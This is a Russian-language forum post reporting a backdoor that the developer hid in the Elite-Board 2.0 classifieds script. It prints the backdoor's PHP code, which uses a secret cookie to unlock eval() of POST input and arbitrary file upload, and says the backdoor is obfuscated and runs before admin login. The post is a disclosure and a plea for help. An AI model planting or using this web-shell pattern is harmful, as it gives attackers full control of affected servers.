Elite-Board - встренный бэкдор (безнадёжная ситуация)

12.10.2016, 03:48

Disasm

Новичок

Регистрация: 10.08.2008

Сообщений: 18

Провел на форуме:
62627

Репутация: 6

Друзья, всех приветствую! Стараюсь по пустякам не обращаться за помощью, но ситуация складывается абсолютно безнадёжная.

Существует старый, как говно мамонта, скрипт доски объявлений - "Elite-Board", разработчик: http://illusionweb.org/

В данный скрипт разработчик внедрил бэкдор, подробнее: http://searchengines.guru/showthread.php?t=770644

Код бэкдора:

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'megasecret'[/COLOR][COLOR="#007700"]]))
{
  if([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'megasecret'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'удалено на всякий случай'[/COLOR][COLOR="#007700"])
   {
      echo[/COLOR][COLOR="#DD0000"]'
          
          
          

          
          

          
          stripslashes
          
          
          
          '[/COLOR][COLOR="#007700"];
     if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
      {
       if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-str'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
        {
[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]]);
        }
       eval([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-exe'[/COLOR][COLOR="#007700"]]);
      }
     echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
     if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]))
      {
[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-path'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mega-file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
      }
     exit();
   }
}[/COLOR][/COLOR]

Бэкдор покоится в файле includes/optimizer/admin/funct.php, инклудится при входе в админку (до авторизации, т.е. авторизация не требуется). Бэкдор по стандарту завёрнут в eval(base64_decode()). Сам файл (funct.php) зашифрован зендом.

Бэкдор присутствует в версиях Elite-Board 2.0